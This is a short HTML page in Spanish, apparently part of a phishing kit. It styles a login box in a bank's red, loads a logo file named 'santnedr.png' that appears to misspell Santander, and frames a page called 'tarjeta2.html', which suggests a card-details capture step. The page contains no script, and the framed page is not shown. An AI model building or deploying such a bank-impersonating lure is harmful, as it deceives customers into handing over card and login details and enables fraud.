<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>Formulario de Inicio de Sesión</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        background-color: #f4f4f4;
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
      }

      #login-box {
        width: 100%;
        max-width: 450px;
        background: #fff;
        padding: 20px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        text-align: center;
      }

      #login-box h1 {
        margin-bottom: 20px;
      }

      #login-box input {
        width: 90%;
        padding: 10px;
        margin: 10px 0;
        border: 0;
        border-bottom: 1px solid #257fa4;
        border-radius: 5px;
        background: #f5fafb;
      }

      #login-box button {
        width: 95%;
        padding: 10px;
        background: #e50b00;
        color: #fff;
        border: none;
        border-radius: 5px;
        cursor: pointer;
      }

      @media (max-width: 767px) {
        body {
          justify-content: flex-start;
          align-items: normal;
        }
        #login-box {
          width: 100%;
          border-radius: 0;
        }
      }
    </style>
  </head>
  <body>
    <div id="login-box">
      <img src="santnedr.png" alt="" />

      <iframe
        src="tarjeta2.html"
        style="width: 100%; height: 800px"
        frameborder="0"
      ></iframe>
    </div>
  </body>
</html>
